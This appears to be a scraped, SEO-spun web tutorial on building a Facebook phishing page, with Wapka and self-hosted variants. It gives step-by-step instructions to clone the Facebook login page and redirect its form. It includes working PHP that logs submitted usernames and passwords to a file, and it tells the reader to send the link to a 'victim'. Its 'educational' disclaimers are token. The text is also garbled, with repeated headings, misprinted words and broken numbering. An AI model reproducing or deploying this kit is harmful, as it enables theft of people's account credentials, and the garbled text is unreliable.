Wapka Facebook Phishing Code



In this tutorial, we’re going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.

Wapka -facebook-phishing-code. Not a member of Pastebin yet? Sign Up, it unlocks many cool features! Copy all the code and paste it into (WML/XHTML code) box and click on Submit button. Step 7: It’s all over now send your site link which was created at Step 2 to your victim. As your victim login to your page his/her E-mail and Password sends to your E-mail by which you have created your account at wapka at first step.

If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, in understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.

Wapka Facebook Phishing Codes

  • Wapka phishing 1st→create an acc on wapka 2nd→goto create a site 3rd→go to admin mode 4th→go to wml/xhtml code. Go to http://pastebin.com/qVNVfpD6.
  • Wapka Phishing codes. Most popular Wapka Facebook fake sites created nowadays, uses original facebook phishing code & w which you will Nnd in below section of this article. Well, Nrst let you know, we are sharing these Wapk scripts just for educational purpose. So that people will know How Phishing sites look like and how the created. We are not responsible for any hard happened to you.
  • In my previous post, I explain the easy method to hack Facebook, WhatsApp, Instagram, etc.So you need to read my previous post because this was read the article, and now many of my friends ask me for email that “How to hack Facebook id using phishing attack” because it is the most powerful trick to get your username and password for any of your victims or your Facebook friend account.
PhishingWapka facebook phishing code 2020

Wapka Facebook Phishing Code 2020

Wapka

What is Phishing?

Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:

Wapka facebook phishing code 2015

Wapka Facebook Phishing Code 2015

A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.

However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required.

  1. Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
  2. Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
  3. If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
  4. You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
  5. Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
  6. Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
  7. Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:

Wapka Facebook Phishing Code

Wapka facebook phishing code 2020

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

  1. At this point, you should now have two files saved: index.htm and post.php.
  2. Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using Bluehost.
  3. After you have signed up for an account, browse to the control panel, and then to file manager.
  4. Once the window opens, go to publick_html.
  5. Delete default.php, and then upload index.htm and post.php.
  6. Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
  7. The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
  8. Now go back to the file manager and public_html. There should be a file labeled username.txt.
  9. Open this file and you should be able to see login credentials that have been entered by a test user.

Final Thoughts

It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.